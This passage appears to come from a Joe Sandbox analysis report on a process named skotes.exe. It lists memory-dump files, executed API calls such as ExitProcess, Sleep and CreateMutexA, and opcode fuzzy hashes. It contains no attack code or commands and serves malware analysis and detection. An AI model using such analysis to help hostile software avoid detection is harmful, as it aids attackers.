Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 39b43aaa8cf9bf8b4ecc2cc20e5b59c68171cf5a94d402c6b4083d83850be29f
Instruction ID: 613ba143b7c4b73e91abe7cadfaac4627b55feeef3d606ec61a6fdc5800c4b3f
Opcode Fuzzy Hash: 39b43aaa8cf9bf8b4ecc2cc20e5b59c68171cf5a94d402c6b4083d83850be29f
Instruction Fuzzy Hash: B8211B71A04219AFDF00EFA4D8869FFBBB9EF48714F205065F901B7261DB709D019BA0

Analysis Process: skotes.exePID: 1404, Parent PID: 2864COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1963
Total number of Limit Nodes:	9

Executed Functions

Function 0015652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0015652A,?,?,?,?,?,00157661), ref: 00156567

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: fc8fcbf8ebcf1898f94b976265d86511de20dc23715efeea7723c6460b8ad1b0
Instruction ID: f50588e655fd393bd41c287efe437edf6261d215bdf9028ea5871ce18f055352
Opcode Fuzzy Hash: fc8fcbf8ebcf1898f94b976265d86511de20dc23715efeea7723c6460b8ad1b0
Instruction Fuzzy Hash: 95E08C30190108EECE25BB19C85DA593B69EF61786F801804FD288F222DB65ED86CA80

Function 00129BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 26c2c58154332edd63c0d36f0f7a1880b796f9e8587ed165924a3b1849d46091
Instruction ID: 2bcdd21922bba82fe0a1ac2fa7b58f985758684bd87f0fb8c44f868eb5a68489
Opcode Fuzzy Hash: 26c2c58154332edd63c0d36f0f7a1880b796f9e8587ed165924a3b1849d46091
Instruction Fuzzy Hash: 87313571B002048BEF189B6CFCADB6DB7B2AFC5324F648218E4149B2D6C7759AE08751

Function 00129F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b789c4fbc1a1d255af3d354421d3a48c01e50578742b30932e3eb1a10e858bbd
Instruction ID: 3ab01388056b5a539a081a5e9e079163ad343886da18b99783690fa6ebc4b3d4
Opcode Fuzzy Hash: b789c4fbc1a1d255af3d354421d3a48c01e50578742b30932e3eb1a10e858bbd
Instruction Fuzzy Hash: 50313731B002148BEF189B78F9A976CBB62EF85320F648218F428DB2D1C7354AD08752

Function 0012A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e0416618cf13be31b4cec02e24433f030493de72db0963d3a991cdcc64d54117
Instruction ID: 09d4a5c9720cf9c6a1f58e43516f8747bb6b9bfaed73f1ea780ce99fabb80dc6
Opcode Fuzzy Hash: e0416618cf13be31b4cec02e24433f030493de72db0963d3a991cdcc64d54117
Instruction Fuzzy Hash: EC314631B002149BEF08DB78ED9976CB772DF85324F648218E424973D1C7369AE08716

Function 0012A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
